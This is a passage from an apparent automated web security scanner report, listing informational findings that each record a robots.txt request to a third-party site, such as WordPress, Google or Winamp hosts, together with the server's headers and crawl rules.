# and would like access please contact us at team@qwerly.com. We will
# generally only grant access to our data via our API.

...[SNIP]...

12.40. http://s.gravatar.com/js/gprofiles.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.gravatar.com
Path:   /js/gprofiles.js

Request

GET /robots.txt HTTP/1.0
Host: s.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sun, 27 Feb 2011 02:30:33 GMT
Last-Modified: Tue, 18 Jan 2011 12:04:24 GMT
Server: ECS (dca/5339)
X-Cache: HIT
Content-Length: 99
Connection: close

User-Agent: *
Disallow: /*.json
Disallow: /*.xml
Disallow: /*.php
Disallow: /*.vcf
Disallow: /*.qr

12.41. http://s0.wp.com/wp-content/themes/h4/global.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.wp.com
Path:   /wp-content/themes/h4/global.css

Request

GET /robots.txt HTTP/1.0
Host: s0.wp.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain; charset=utf-8
Date: Sun, 27 Feb 2011 16:44:33 GMT
Last-Modified: Fri, 25 Feb 2011 19:41:29 GMT
Server: ECS (dca/5339)
Vary: Accept-Encoding
X-Cache: HIT
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-nc: HIT ord 2
X-Pingback: http://s-origin.wordpress.com/xmlrpc.php
Content-Length: 269
Connection: close

Sitemap: http://s-origin.wordpress.com/sitemap.xml

User-agent: IRLbot
Crawl-delay: 3600

User-agent: *
Disallow: /next/

# har har
User-agent: *
Disallow: /activate/

User-agent: *
Disallow: /signup/
...[SNIP]...

12.42. http://s1.wp.com/wp-includes/js/jquery/jquery.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s1.wp.com
Path:   /wp-includes/js/jquery/jquery.js

Request

GET /robots.txt HTTP/1.0
Host: s1.wp.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain; charset=utf-8
Date: Sun, 27 Feb 2011 02:30:30 GMT
Last-Modified: Fri, 25 Feb 2011 19:41:29 GMT
Server: ECS (dca/5339)
Vary: Accept-Encoding
X-Cache: HIT
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-nc: HIT ord 2
X-Pingback: http://s-origin.wordpress.com/xmlrpc.php
Content-Length: 269
Connection: close

Sitemap: http://s-origin.wordpress.com/sitemap.xml

User-agent: IRLbot
Crawl-delay: 3600

User-agent: *
Disallow: /next/

# har har
User-agent: *
Disallow: /activate/

User-agent: *
Disallow: /signup/
...[SNIP]...

12.43. http://s2.wp.com/wp-content/themes/vip/tctechcrunch/style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s2.wp.com
Path:   /wp-content/themes/vip/tctechcrunch/style.css

Request

GET /robots.txt HTTP/1.0
Host: s2.wp.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain; charset=utf-8
Date: Sun, 27 Feb 2011 02:30:30 GMT
Last-Modified: Fri, 25 Feb 2011 19:41:29 GMT
Server: ECS (dca/5339)
Vary: Accept-Encoding
X-Cache: HIT
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-nc: HIT ord 2
X-Pingback: http://s-origin.wordpress.com/xmlrpc.php
Content-Length: 269
Connection: close

Sitemap: http://s-origin.wordpress.com/sitemap.xml

User-agent: IRLbot
Crawl-delay: 3600

User-agent: *
Disallow: /next/

# har har
User-agent: *
Disallow: /activate/

User-agent: *
Disallow: /signup/
...[SNIP]...

12.44. http://s7.addthis.com/js/250/addthis_widget.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s7.addthis.com
Path:   /js/250/addthis_widget.js

Request

GET /robots.txt HTTP/1.0
Host: s7.addthis.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 24 Feb 2011 08:58:05 GMT
ETag: "d607d1-1b-49d03695ce140"
Content-Type: text/plain; charset=UTF-8
Date: Mon, 28 Feb 2011 17:50:04 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *


12.45. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY-OUCIPzlAjIF-LIAAB8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing-cache.google.com
Path:   /safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY-OUCIPzlAjIF-LIAAB8

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing-cache.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 14 Feb 2011 19:41:32 GMT
Date: Sat, 26 Feb 2011 20:43:21 GMT
Expires: Sat, 26 Feb 2011 20:43:21 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

12.46. http://safebrowsing.clients.google.com/safebrowsing/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 14 Feb 2011 19:41:32 GMT
Date: Sat, 26 Feb 2011 20:43:20 GMT
Expires: Sat, 26 Feb 2011 20:43:20 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

12.47. http://services.winamp.com/ivw/get  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://services.winamp.com
Path:   /ivw/get

Request

GET /robots.txt HTTP/1.0
Host: services.winamp.com

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:44:52 GMT
Server: Apache
Last-Modified: Wed, 24 Nov 2010 13:32:51 GMT
ETag: "47-495cc869ac6c0"
Accept-Ranges: bytes
Content-Length: 71
Cache-Control: max-age=86400
Expires: Mon, 28 Feb 2011 17:44:52 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=2, max=9998
Connection: Keep-Alive
Content-Type: text/plain

# robots.txt for http://services.winamp.com/
User-agent: *
Disallow: /

12.48. http://shop.winamp.com/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.winamp.com
Path:   /store

Request

GET /robots.txt HTTP/1.0
Host: shop.winamp.com

Response

HTTP/1.1 200 OK
ETag: "49-3ebbc10b"
Content-Type: text/plain
Last-Modified: Fri, 09 May 2003 14:54:03 GMT
Connection: close
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (G;max-age=0+0;age=0;ecid=97344965854,0)
Content-Length: 73
Date: Wed, 23 Feb 2011 00:07:31 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app50
Accept-Ranges: bytes
Set-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3254911242.516.0000; path=/

User-agent: Ultraseek
Disallow: /
User-agent: Inktomi Search
Disallow: /

12.49. https://shop.winamp.com/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shop.winamp.com
Path:   /store

Request

GET /robots.txt HTTP/1.0
Host: shop.winamp.com

Response

HTTP/1.1 200 OK
ETag: "49-3ebbc10b"
Content-Type: text/plain
Last-Modified: Fri, 09 May 2003 14:54:03 GMT
Connection: close
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (G;max-age=0+0;age=0;ecid=118819786599,0)
Content-Length: 73
Date: Tue, 05 Oct 2010 15:25:33 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app51
Accept-Ranges: bytes
Set-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=3271688458.516.0000; path=/

User-agent: Ultraseek
Disallow: /
User-agent: Inktomi Search
Disallow: /

12.50. http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/lqIx_MUkbGi.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yT/r/lqIx_MUkbGi.css

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-Cnection: close
Date: Sat, 26 Feb 2011 23:10:52 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

12.51. http://static02.linkedin.com/scds/common/u/img/sprite/sprite_connect_v6.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static02.linkedin.com
Path:   /scds/common/u/img/sprite/sprite_connect_v6.png

Request

GET /robots.txt HTTP/1.0
Host: static02.linkedin.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800
Content-Type: text/plain
Date: Sun, 27 Feb 2011 02:25:40 GMT
ETag: "1938560224"
Expires: Sun, 06 Mar 2011 02:25:40 GMT
Last-Modified: Wed, 16 Feb 2011 01:33:17 GMT
Server: ECS (dca/5339)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 1494
Connection: close

User-agent: *
Disallow: /addContacts*
Disallow: /addressBookExport*
Disallow: /analytics/
Disallow: /cap/
Disallow: /companyDir*
Disallow: /connections*
Disallow: /edurec*
Disallow: /endorsements
Disa
...[SNIP]...

12.52. http://statistics.wibiya.com/SetToolbarLoad.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statistics.wibiya.com
Path:   /SetToolbarLoad.php

Request

GET /robots.txt HTTP/1.0
Host: statistics.wibiya.com

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:52:19 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny6 with Suhosin-Patch
Last-Modified: Sun, 02 May 2010 10:18:11 GMT
ETag: "7406c-19-48599cb1cdec0"
Accept-Ranges: bytes
Content-Length: 25
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

12.53. http://tags.crwdcntrl.net/5/c=25/b=1225400  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /5/c=25/b=1225400

Request

GET /robots.txt HTTP/1.0
Host: tags.crwdcntrl.net

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:23:07 GMT
Server: Apache/2.2.8 (CentOS)
Last-Modified: Thu, 15 Jul 2010 15:31:44 GMT
ETag: "2e70461-1a-48b6eccb63800"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

12.54. http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://techcrunch.com
Path:   /2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/

Request

GET /robots.txt HTTP/1.0
Host: techcrunch.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 27 Feb 2011 02:30:29 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://techcrunch.com/xmlrpc.php
Content-Length: 495
X-nc: HIT luv 45

# If you are regularly crawling WordPress.com sites please use our firehose to receive real-time push updates instead.
# Please see http://en.wordpress.com/firehose/ for more details.

Sitemap: http:/
...[SNIP]...

12.55. http://telligent.com/products/telligent_community/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /products/telligent_community/

Request

GET /robots.txt HTTP/1.0
Host: telligent.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 26 Jul 2010 15:37:23 GMT
Accept-Ranges: bytes
ETag: "1321571d82ccb1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a40+GMT; expires=Sun, 26-Feb-2012 22:04:40 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-1850=; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:40 GMT
Connection: close
Content-Length: 143

User-agent: *
Disallow: /*/tags/
Disallow: /tags/
Disallow: /*/members/
Disallow: /members/
Disallow: /utility/
Disallow: /communities/

12.56. http://tetlaw.id.au/view/blog/prototype-class-fastinit/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tetlaw.id.au
Path:   /view/blog/prototype-class-fastinit/

Request

GET /robots.txt HTTP/1.0
Host: tetlaw.id.au

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:11:07 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Tue, 15 Feb 2011 04:09:04 GMT
ETag: "bd80fa-28-532fd800"
Accept-Ranges: bytes
Content-Length: 40
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /upload/private/

12.57. http://tools.google.com/service/update2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tools.google.com
Path:   /service/update2

Request

GET /robots.txt HTTP/1.0
Host: tools.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 14 Feb 2011 19:41:32 GMT
Date: Sat, 26 Feb 2011 21:34:07 GMT
Expires: Sat, 26 Feb 2011 21:34:07 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

12.58. http://translate.googleapis.com/translate_a/l  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.googleapis.com
Path:   /translate_a/l

Request

GET /robots.txt HTTP/1.0
Host: translate.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 25 Mar 2010 09:42:43 GMT
Date: Sun, 27 Feb 2011 16:52:26 GMT
Expires: Sun, 27 Feb 2011 16:52:26 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

12.59. https://twitter.com/oauth/authenticate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://twitter.com
Path:   /oauth/authenticate

Request

GET /robots.txt HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 02:57:27 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1298948247189590; path=/; expires=Tue, 08-Mar-11 02:57:27 GMT; domain=.twitter.com
Last-Modified: Mon, 28 Feb 2011 22:57:00 GMT
Accept-Ranges: bytes
Content-Length: 489
Cache-Control: max-age=86400
Expires: Wed, 02 Mar 2011 02:57:27 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/plain; charset=UTF-8

#Google Search Engine Robot
User-agent: Googlebot
# Crawl-delay: 10 -- Googlebot ignores crawl-delay ftl
Disallow: /*?
Disallow: /*/with_friends

#Yahoo! Search Engine Robot
User-Agent: Slurp
Crawl-de
...[SNIP]...

12.60. http://widgets.digg.com/buttons/count  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Request

GET /robots.txt HTTP/1.0
Host: widgets.digg.com

Response

HTTP/1.1 200 OK
Age: 0
Date: Sun, 27 Feb 2011 02:32:53 GMT
Via: NS-CACHE: 100
Server: Apache
Last-Modified: Sun, 27 Jul 2008 09:42:54 GMT
Accept-Ranges: bytes
X-Digg-Time: D=411 (null)
Content-Type: text/plain; charset=UTF-8
Cache-Control: private, max-age=86399
Expires: Mon, 28 Feb 2011 02:32:52 GMT
X-CDN: Cotendo
Connection: close

User-agent: *
Disallow: /

12.61. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfusion.com
Path:   /Adfusion.PartnerSite/categoryhtml.aspx

Request

GET /robots.txt HTTP/1.0
Host: www.adfusion.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Mon, 26 Jan 2009 17:46:07 GMT
Accept-Ranges: bytes
ETag: "f48e93f7dd7fc91:b65"
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
Date: Sun, 27 Feb 2011 17:44:59 GMT
Connection: close

User-agent: *
Disallow:

12.62. http://www.atlanticyachtandship.com/about_us.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.atlanticyachtandship.com
Path:   /about_us.html

Request

GET /robots.txt HTTP/1.0
Host: www.atlanticyachtandship.com

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:53:30 GMT
Server: Apache
Last-Modified: Mon, 31 Aug 2009 18:11:30 GMT
ETag: "1b30322-1e0-47273f68bb880"
Accept-Ranges: bytes
Content-Length: 480
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /_db_backups/
Disallow: /!ARCHIVED/
Disallow: /!RAW/
Disallow: /admin/
Disallow: /administrator/
Disallow: /cgi/
Disallow: /Connections/
Disallow: /css/
Dis
...[SNIP]...

12.63. http://www.capgemini.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capgemini.com
Path:   /

Request

GET /robots.txt HTTP/1.0
Host: www.capgemini.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Mon, 28 Feb 2011 17:50:08 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 322
Last-Modified: Tue, 11 May 2010 20:38:49 GMT
Connection: close
Accept-Ranges: bytes

# robots.txt for http://www.capgemini.com/
# email webmaster@capgemini.com for constructive comments
User-agent: *
Disallow: /css
Disallow: /js
Disallow: /img
Disallow: /visualidentity
Disallow: /down
...[SNIP]...

12.64. http://www.cgisecurity.com/lib/WH-WhitePaper_XST_ebook.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cgisecurity.com
Path:   /lib/WH-WhitePaper_XST_ebook.pdf

Request

GET /robots.txt HTTP/1.0
Host: www.cgisecurity.com

Response

HTTP/1.1 200 OK
Server: Apache
X-PhApp: oak-tp-web010
X-Webserver: oak-tp-web010
Vary: cookie
Expires: Thu, 10 Feb 2011 10:26:30 GMT
Last-Modified: Sun, 02 Nov 2008 21:12:00 GMT
Content-Disposition: inline; filename=robots.txt
Content-Type: text/plain; charset=utf-8
Keep-Alive: timeout=300, max=100
Content-Length: 130
Date: Sun, 27 Feb 2011 17:38:04 GMT
X-Varnish: 2567706910 1015820015
Age: 1509094
Via: 1.1 varnish
Connection: close

# domo arigato mr. roboto

User-agent: *
Disallow: /secret/
Disallow: /cgi-bin/
Disallow: /nikto-mirror/
Disallow: /archive/

12.65. http://www.freefind.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freefind.com
Path:   /

Request

GET /robots.txt HTTP/1.0
Host: www.freefind.com

Response

HTTP/1.0 200 OK
Server: FreeFind/8.2
ETag: AAAASk+o8Cw
Last-Modified: Wed, 16 Jun 2010 02:43:26 GMT
Content-Type: text/plain
Content-Length: 682
Date: Tue, 01 Mar 2011 02:01:50 GMT

# this entire site is copyright 1998-2006, FreeFind.com
#
# NOTICE: meta-searching this site is prohibited
#
# keep polite spiders from getting in the machinery
# <!-- FreeFind No Map --> <!-- F
...[SNIP]...

12.66. http://www.fusionbot.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fusionbot.com
Path:   /

Request

GET /robots.txt HTTP/1.0
Host: www.fusionbot.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 01 Mar 2011 02:03:53 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Mon, 30 Jun 2008 16:12:46 GMT
ETag: "16294b22ccdac81:1b86"
Content-Length: 134

User-agent: *
Disallow: /sign_up_test.asp
Disallow: /_vti_bin/
Disallow: /toolbar

Sitemap: http://www.fusionbot.com/sitemaps.asp

12.67. https://www.fusionbot.com/login.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fusionbot.com
Path:   /login.asp

Request

GET /robots.txt HTTP/1.0
Host: www.fusionbot.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 01 Mar 2011 02:04:13 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Mon, 30 Jun 2008 16:12:46 GMT
ETag: "16294b22ccdac81:1b86"
Content-Length: 134

User-agent: *
Disallow: /sign_up_test.asp
Disallow: /_vti_bin/
Disallow: /toolbar

Sitemap: http://www.fusionbot.com/sitemaps.asp

12.68. http://www.homelandstupidity.us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homelandstupidity.us
Path:   /

Request

GET /robots.txt HTTP/1.0
Host: www.homelandstupidity.us

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:11:07 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761867+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://www.homelandstupidity.us/xmlrpc.php

User-agent: *
Disallow:

12.69. http://www.kingdee.com/en/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kingdee.com
Path:   /en/

Request

GET /robots.txt HTTP/1.0
Host: www.kingdee.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.49
Date: Sun, 27 Feb 2011 21:42:22 GMT
Content-Type: text/plain
ETag: W/"131-1249354180046"
Last-Modified: Tue, 04 Aug 2009 02:49:40 GMT
Content-Length: 131
X-Via: 1.0 jsyz251:8103 (Cdn Cache Server V2.0), 1.0 wzdx166:8103 (Cdn Cache Server V2.0)
Connection: close
Age: 1

#
# robots.txt for kingdee
# Version 4.0.0
#

User-agent: *
Disallow: /admin/
Sitemap:http://www.kingdee.com/sitemap.xml


12.70. http://www.leadlife.com/analytics/lla.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.leadlife.com
Path:   /analytics/lla.aspx

Request

GET /robots.txt HTTP/1.0
Host: www.leadlife.com

Response

HTTP/1.1 200 OK
Content-Length: 70
Content-Type: text/plain
Last-Modified: Fri, 25 Feb 2011 14:57:24 GMT
Accept-Ranges: bytes
ETag: "d536c84ffcd4cb1:57ff"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 28 Feb 2011 17:50:14 GMT
Connection: close

User-Agent: *
Disallow: /operations.html
Disallow: operations.html

12.71. http://www.opengroup.org/togaf/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf/

Request

GET /robots.txt HTTP/1.0
Host: www.opengroup.org

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:48:46 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Last-Modified: Mon, 16 Aug 2010 22:10:57 GMT
ETag: "3217-298-4c69b771"
Accept-Ranges: bytes
Content-Length: 664
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

# robots.txt for http://www.opengroup.org

User-agent: *
Disallow: LEDSign/
Disallow: WebEvent/
Disallow: archive/
Disallow: bin/
Disallow: bookshop/
Disallow: buttons/
Disallow: dev/
Disallow: dynawe
...[SNIP]...

12.72. http://www.sti-seoservices.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sti-seoservices.com
Path:   /

Request

GET /robots.txt HTTP/1.0
Host: www.sti-seoservices.com

Response

HTTP/1.0 200 OK
Date: Sat, 26 Feb 2011 23:11:01 GMT
Server: Apache/2.0.63 (Red Hat)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=at5k4sldc8krtaqn9i46dbip83; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.sti-seoservices.com/xmlrpc.php
Content-Length: 80
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.sti-seoservices.com/sitemap.xml.gz

12.73. http://www.sti-world.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sti-world.com
Path:   /

Request

GET /robots.txt HTTP/1.0
Host: www.sti-world.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Feb 2011 23:11:05 GMT
Content-Length: 43
Content-Type: text/plain
Last-Modified: Tue, 28 Dec 2010 16:44:08 GMT
Accept-Ranges: bytes
ETag: "94a9b672aea6cb1:6b9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

User-Agent: *
Disallow: /bin
Allow: /


12.74. http://www.stisoftware.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stisoftware.net
Path:   /

Request

GET /robots.txt HTTP/1.0
Host: www.stisoftware.net

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Feb 2011 23:10:50 GMT
Content-Length: 27
Content-Type: text/plain
Last-Modified: Tue, 02 Dec 2008 14:11:24 GMT
Accept-Ranges: bytes
ETag: "cdd238dc8754c91:6b9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

User-Agent: *
Allow: /


12.75. http://www.winamp.com/media-player/en  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winamp.com
Path:   /media-player/en

Request

GET /robots.txt HTTP/1.0
Host: www.winamp.com

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:44:26 GMT
Server: Apache
Cache-Control: max-age=86400
Expires: Mon, 28 Feb 2011 17:44:26 GMT
Vary: Accept-Encoding
Content-Length: 452
Connection: close
Content-Type: text/html; charset=UTF-8

# robots.txt for http://www.winamp.com/

User-agent: *

Disallow: /search
Disallow: /inc/
Disallow: /bin/
Disallow: /update/
Disallow: /browser/
Disallow: /buy/
Disallow: /errors/
Disallow: /partners/
...[SNIP]...

12.76. http://www.wolframalpha.com/input/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wolframalpha.com
Path:   /input/

Request

GET /robots.txt HTTP/1.0
Host: www.wolframalpha.com

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 01:59:13 GMT
Server: Apache
Set-Cookie: WR_SID=173.193.214.243.1298944753030270; path=/; max-age=315360000; domain=.wolframalpha.com
Last-Modified: Thu, 24 Feb 2011 16:48:42 GMT
ETag: "fd-49d09fc6b4e80"
Accept-Ranges: bytes
Content-Length: 253
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /input/
Disallow: /input/pod.jsp
Noindex: /input/
Noindex: /termsofuse.html
Noindex: /privacypolicy.html


User-agent: Mediapartners-Google
Disallow:

User-agent: Browsershot
...[SNIP]...

12.77. http://www.zoho.com/company.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zoho.com
Path:   /company.html

Request

GET /robots.txt HTTP/1.0
Host: www.zoho.com

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 02:56:56 GMT
Server: Apache
Last-Modified: Tue, 15 Feb 2011 11:09:47 GMT
Accept-Ranges: bytes
Content-Length: 1158
Vary: Accept-Encoding,User-Agent
Cache-Control: public
Connection: close
Content-Type: text/plain; charset=UTF-8

# ------------------------------------------
# ZOHO Corp. -- http://www.zoho.com
# Robot Exclusion File -- robots.txt
# Author: Webmaster
# Last Updated: 19/11/08
# --------------------------------
...[SNIP]...

12.78. http://www1.wolframalpha.com/Calculate/MSP/MSP108819ecf93a845dci5i000032708gihb0c32g77  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.wolframalpha.com
Path:   /Calculate/MSP/MSP108819ecf93a845dci5i000032708gihb0c32g77

Request

GET /robots.txt HTTP/1.0
Host: www1.wolframalpha.com

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 03:15:44 GMT
Server: Apache
Set-Cookie: WR_SID=173.193.214.243.1298949344283467; path=/; max-age=315360000; domain=.wolframalpha.com
